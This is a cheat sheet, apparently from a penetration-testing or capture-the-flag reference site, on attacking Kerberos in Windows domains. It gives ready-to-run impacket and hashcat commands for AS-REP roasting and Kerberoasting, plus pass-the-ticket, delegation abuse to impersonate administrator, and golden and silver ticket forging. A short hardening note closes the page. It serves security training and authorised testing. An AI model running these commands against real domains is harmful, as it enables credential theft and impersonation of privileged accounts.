Kerberos
aka krb5
Windows domain auth on 88. The home of AS-REP roasting, Kerberoasting, and ticket attacks (pass-the-ticket, golden/silver tickets) for offline cracking and impersonation.
Ports
| Port | Proto | Notes |
|---|---|---|
88 | tcp | Kerberos (presence indicates a DC) |
Fingerprint
- 88 open alongside 389/445 means a Domain Controller
- Realm equals the AD domain name
Key files
| Path | Holds | Sensitive |
|---|---|---|
/etc/krb5.conf | realm and KDC config for Linux tooling | |
*.ccache / KRB5CCNAME | cached tickets for pass-the-ticket | sensitive |
*.kirbi | Windows ticket format (convert with ticketConverter) | sensitive |
Exploitation primitives
- AS-REP roast accounts with DONT_REQ_PREAUTH (GetNPUsers.py), crack offline
- Kerberoast service accounts with an SPN (GetUserSPNs.py), crack offline
- Pass-the-ticket with a .ccache; golden ticket (krbtgt hash) and silver ticket (service hash)
Overview
Kerberos on 88 is the domain’s ticketing system. Two offline-crackable roasts (AS-REP and Kerberoast) need only a single valid context (or none), and stolen tickets let you reuse or forge identities.
Sync your clock first
Kerberos refuses tickets when your clock differs from the DC by more than ~5 minutes (KRB_AP_ERR_SKEW / “Clock skew too great”). Do this before any Kerberos auth.
Set your clock from the DC (disable auto-NTP first so it doesn’t drift back):
sudo timedatectl set-ntp off && sudo ntpdate <DC_IP>No ntpdate installed? use rdate:
sudo rdate -n <DC_IP>Don’t want to touch your system clock? Wrap the tool in
faketimeinstead — e.g.faketime '+7h' nxc smb <DC_IP> -u user -p pass -k, using the offset thatsudo ntpdate -q <DC_IP>reports.
Roasting
AS-REP roast (accounts without preauth):
impacket-GetNPUsers dom.local/ -usersfile users.txt -no-passCrack it (hashcat mode 18200):
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txtKerberoast (SPN accounts):
impacket-GetUserSPNs dom.local/user:pass -requestCrack it (hashcat mode 13100):
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txtTickets
Set the ticket cache:
export KRB5CCNAME=ticket.ccacheUse it (hostnames, not IPs):
impacket-psexec -k -no-pass dc.dom.localDelegation
Unconstrained — once a privileged ticket lands on the host, export it (sekurlsa::tickets / monitor with Rubeus).
Constrained (msDS-AllowedToDelegateTo) — S4U to impersonate any user to the allowed SPN:
getST.py -spn cifs/target.dom.local -impersonate administrator -dc-ip <TARGET> dom.local/svc:passForge tickets once you hold the key — golden (krbtgt) or silver (service account):
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain dom.local administratorConvert tickets between formats
Windows .kirbi (Rubeus/Mimikatz) ↔ Linux .ccache (impacket) — needed to reuse a stolen ticket across platforms:
impacket-ticketConverter ticket.kirbi ticket.ccacheNotes
Always target by hostname, not IP (Kerberos binds tickets to SPNs), and tools usually need the realm in UPPERCASE. If auth still fails after a clock sync, check the realm/KDC in /etc/krb5.conf.
Hardening
Strong service-account passwords, require preauth, and protect the krbtgt hash (rotate twice on compromise).
Seen on these machines 8
